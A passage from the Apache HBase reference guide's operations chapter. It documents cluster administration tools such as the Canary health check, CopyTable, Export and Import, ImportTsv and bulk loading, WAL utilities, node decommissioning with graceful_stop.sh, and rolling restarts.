region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nSo you can see, table test-01 has two regions and two column families, so the Canary tool will pick 4 small piece of data from 4 (2 region * 2 store) different stores.\nThis is a default behavior of the this tool does.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer, and can also put your RegionServer name as input options for canary-test specific RegionServer.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test as daemon mode\n\nRun repeatedly with interval defined in option `-interval` whose default value is 6 seconds.\nThis daemon will stop itself and return non-zero error code if any error occurs, due to the default value of option -f is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with internal 5 seconds and will not stop itself even if errors occur in the test.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds, the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 600000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only check the read operations, it's hard to find the problem in the\nwrite path. To enable the write sniffing, you can run canary with the `-writeSniffing` option.\nWhen the write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table distributed on all region servers. In each sniffing period, the canary will\ntry to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default value size of each put is 10 bytes and you can set it by the config key:\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failure, due to e.g. RetriesExhaustedException,\nwhile returning normal exit code. To treat read \/ write failure as error, you can run canary\nwith the `-treatFailureAsError` option. When enabled, read \/ write failure would result in error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\nproperty>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and detail.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accept a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster run `$.\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g. cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (This is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== FSHLog tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_.\ndirectory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file so you can test wholesomeness of file by redirecting `STDOUT` to `\/dev\/null` and testing the program return.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WALPrettyPrinter\n\nThe `WALPrettyPrinter` is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the `WALPrettyPrinter` was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or of all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\n\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeer.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:https:\/\/blog.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of table to HDFS in a sequence file.\nThe Export can be run via a Coprocessor Endpoint or MapReduce. Invoke via:\n\n*mapreduce-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*endpoint-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.coprocessor.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*The Comparison of Endpoint-based Export And Mapreduce-based Export*\n|===\n||Endpoint-based Export|Mapreduce-based Export\n\n|HBase version requirement\n|2.0+\n|0.2.1+\n\n|Maven dependency\n|hbase-endpoint\n|hbase-mapreduce (2.0+), hbase-server(prior to 2.0)\n\n|Requirement before dump\n|mount the endpoint.Export on the target table\n|deploy the MapReduce framework\n\n|Read latency\n|low, directly read the data from region\n|normal, traditional RPC scan\n\n|Read Scalability\n|depend on number of regions\n|depend on number of mappers (see TableInputFormatBase#getSplits)\n\n|Timeout\n|operation timeout. configured by hbase.client.operation.timeout\n|scan timeout. configured by hbase.client.scanner.timeout.period\n\n|Permission requirement\n|READ, EXECUTE\n|READ\n\n|Fault tolerance\n|no\n|depend on MapReduce\n|===\n\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you have preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.tool.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing, in that case only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]>\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flags `-Dmapreduce.jobtracker.address=local` on the command line.\n\n[[rowcounter]]\n=== RowCounter and CellCounter\n\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.\nThis is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.\nIt will run the mapreduce all in a single process but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit\nthe time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]\n----\n\nRowCounter only counts one version per cell.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\nHBase ships another diagnostic mapreduce job called link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/CellCounter.html[CellCounter].\nLike RowCounter, it gathers more fine-grained statistics about your table.\nThe statistics gathered by RowCounter are more fine-grained and include:\n\n* Total number of rows in the table.\n* Total number of CFs across all rows.\n* Total qualifiers across all rows.\n* Total occurrence of each CF.\n* Total occurrence of each qualifier.\n* Total number of versions of each qualifier.\n\nThe program allows you to limit the scope of the run.\nProvide a row regex or prefix to limit the rows to analyze.\nSpecify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\nUse `hbase.mapreduce.scan.column.family` to specify scanning a single column family.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]\n----\n\nNote: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n=== mlockall\n\nIt is possible to optionally pin your servers in physical memory making them less likely to be swapped out in oversubscribed environments by having the servers call link:http:\/\/linux.die.net\/man\/2\/mlockall[mlockall] on startup.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4391[HBASE-4391 Add ability to\n start RS as root and call mlockall] for how to build the optional library and have it run on startup.\n\n[[compaction.tool]]\n=== Offline Compaction Tool\n\nSee the usage for the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/regionserver\/CompactionTool.html[CompactionTool].\nRun it like:\n\n[source, bash]\n----\n$ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.CompactionTool\n----\n\n=== `hbase clean`\n\nThe `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.\nIt is appropriate to use for testing.\nRun it with no options for usage instructions.\nThe `hbase clean` command was introduced in HBase 0.98.\n\n----\n\n$ bin\/hbase clean\nUsage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)\nOptions:\n --cleanZk cleans hbase related data from zookeeper.\n --cleanHdfs cleans hbase related data from hdfs.\n --cleanAll cleans hbase related data from both zookeeper and hdfs.\n----\n\n=== `hbase pe`\n\nThe `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.\nThe `hbase pe` command was introduced in HBase 0.98.4.\n\nThe PerformanceEvaluation tool accepts many different options and commands.\nFor usage instructions, run the command with no options.\n\nTo run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.\n\nThe PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to \"warm up\" the cluster before testing starts.\n\n=== `hbase ltt`\n\nThe `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.\nThe `hbase ltt` command was introduced in HBase 0.98.4.\n\nYou must specify either `-write` or `-update-read` as the first option.\nFor general usage instructions, pass the `-h` option.\n\nTo run LoadTestTool prior to HBase 0.98.4, issue the command +hbase\n org.apache.hadoop.hbase.util.LoadTestTool+.\n\nThe LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLS and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.\n\n[[ops.regionmgt]]\n== Region Management\n\n[[ops.regionmgt.majorcompact]]\n=== Major Compaction\n\nMajor compactions can be requested via the HBase shell or link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin.majorCompact].\n\nNote: major compactions do NOT do region merges.\nSee <<compaction,compaction>> for more information about compactions.\n\n[[ops.regionmgt.merge]]\n=== Merge\n\nMerge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>\n----\n\nIf you feel you have too many regions and want to consolidate them, Merge is the utility you need.\nMerge must run be done when the cluster is down.\nSee the link:https:\/\/web.archive.org\/web\/20111231002503\/http:\/\/ofps.oreilly.com\/titles\/9781449396107\/performance.html[O'Reilly HBase\n Book] for an example of usage.\n\nYou will need to pass 3 parameters to this application.\nThe first one is the table name.\nThe second one is the fully qualified name of the first region to merge, like \"table_name,\\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.\". The third one is the fully qualified name for the second region to merge.\n\nAdditionally, there is a Ruby script attached to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621] for region merging.\n\n[[node.management]]\n== Node Management\n\n[[decommission]]\n=== Node Decommission\n\nYou can stop an individual RegionServer by running the following script in the HBase directory on the particular node:\n\n----\n$ .\/bin\/hbase-daemon.sh stop regionserver\n----\n\nThe RegionServer will first close all regions and then shut itself down.\nOn shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.\nThe master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the nodes the RegionServer was carrying.\n\n.Disable the Load Balancer before Decommissioning a node\n[NOTE]\n====\nIf the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.\nAvoid any problems by disabling the balancer first.\nSee <<lb,lb>> below.\n====\n\n.Kill Node Tool\n[NOTE]\n====\nIn hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.\nHardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.\nIt deletes all the znodes of the server, starting the recovery process.\nPlug in the script into your monitoring\/fault detection tools to initiate faster failover.\nBe careful how you use this disruptive tool.\nCopy the script if you need to make use of it in a version of hbase previous to hbase-2.0.\n====\n\nA downside to the above stop of a RegionServer is that regions could be offline for a good period of time.\nRegions are closed in order.\nIf many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.\nIn Apache HBase 0.90.2, we added facility for having a node gradually shed its load and then shutdown itself down.\nApache HBase 0.90.2 added the _graceful_stop.sh_ script.\nHere is its usage:\n\n----\n$ .\/bin\/graceful_stop.sh\nUsage: graceful_stop.sh [--config &conf-dir>] [--restart] [--reload] [--thrift] [--rest] &hostname>\n thrift If we should stop\/start thrift before\/after the hbase stop\/start\n rest If we should stop\/start rest before\/after the hbase stop\/start\n restart If we should restart after graceful stop\n reload Move offloaded regions back on to the stopped server\n debug Move offloaded regions back on to the stopped server\n hostname Hostname of server we are to stop\n----\n\nTo decommission a loaded RegionServer, run the following: +$\n .\/bin\/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.\n\n.On `HOSTNAME`\n[NOTE]\n====\nThe `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.\nCheck the list of RegionServers in the master UI for how HBase is referring to servers.\nIt's usually hostname but can also be FQDN.\nWhatever HBase is using, this is what you should pass the _graceful_stop.sh_ decommission script.\nIf you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it and so it will fail when it checks if server is currently running; the graceful unloading of regions will not run.\n====\n\nThe _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.\nIt will verify the region deployed in the new location before it will moves the next region and so on until the decommissioned server is carrying zero regions.\nAt this point, the _graceful_stop.sh_ tells the RegionServer `stop`.\nThe master will at this point notice the RegionServer gone but all regions will have already been redeployed and because the RegionServer went down cleanly, there will be no WAL logs to split.\n\n[[lb]]\n.Load Balancer\n[NOTE]\n====\nIt is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:\n\n[source]\n----\nhbase(main):001:0> balance_switch false\ntrue\n0 row(s) in 0.3590 seconds\n----\n\nThis turns the balancer OFF.\nTo reenable, do:\n\n[source]\n----\nhbase(main):001:0> balance_switch true\nfalse\n0 row(s) in 0.3590 seconds\n----\n\nThe `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.\nIf it exits prematurely because of error, it will not have reset the balancer.\nHence, it is better to manage the balancer apart from `graceful_stop` reenabling it after you are done w\/ graceful_stop.\n====\n\n[[draining.servers]]\n==== Decommissioning several Regions Servers concurrently\n\nIf you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.\nTo gracefully drain multiple regionservers at the same time, RegionServers can be put into a \"draining\" state.\nThis is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root\/draining_ znode.\nThis znode has format `name,port,startcode` just like the regionserver entries under _hbase_root\/rs_ znode.\n\nWithout this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.\nMarking RegionServers to be in the draining state prevents this from happening.\nSee this link:http:\/\/inchoate-clatter.blogspot.com\/2012\/03\/hbase-ops-automation.html[blog\n post] for more details.\n\n[[bad.disk]]\n==== Bad or Failing Disk\n\nIt is good having <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine for the case where a disk plain dies.\nBut usually disks do the \"John Wayne\" -- i.e.\ntake a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.\nIn this case you want to decommission the disk.\nYou have two options.\nYou can link:https:\/\/wiki.apache.org\/hadoop\/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission\n the datanode] or, less disruptive in that only the bad disks data will be rereplicated, can stop the datanode, unmount the bad volume (You can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0). The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general but for some latency spikes, it should keep on chugging.\n\n.Short Circuit Reads\n[NOTE]\n====\nIf you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; when short-circuiting reading, though chmod'd so regionserver cannot have access, because it already has the files open, it will be able to keep reading the file blocks from the bad disk even though the datanode is down.\nMove the regions back after you restart the datanode.\n====\n\n[[rolling]]\n=== Rolling Restart\n\nSome cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.\nIn addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.\nSee the release notes for release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.\n\nThere are multiple ways to restart your cluster nodes, depending on your situation.\nThese methods are detailed below.\n\n==== Using the `rolling-restart.sh` Script\n\nHBase ships with a script, _bin\/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.\nThe script is provided as a template for your own script, and is not explicitly tested.\nIt requires password-less SSH login to be configured and assumes that you have deployed using a tarball.\nThe script requires you to set some environment variables before running it.\nExamine the script and modify it to suit your needs.\n\n._rolling-restart.sh_ General Usage\n====\n----\n\n$ .\/bin\/rolling-restart.sh --help\nUsage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]\n----\n====\n\nRolling Restart on RegionServers Only::\n To perform a rolling restart on the RegionServers only, use the `--rs-only` option.\n This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.\n\nRolling Restart on Masters Only::\n To perform a rolling restart on the active and backup Masters, use the `--master-only` option.\n You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.\n\nGraceful Restart::\n If you specify the `--graceful` option, RegionServers are restarted using the _bin\/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.\n This is safer, but can delay the restart.\n\nLimiting the Number of Threads::\n To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.\n\n[[rolling.restart.manual]]\n==== Manual Rolling Restart\n\nTo retain more control over the 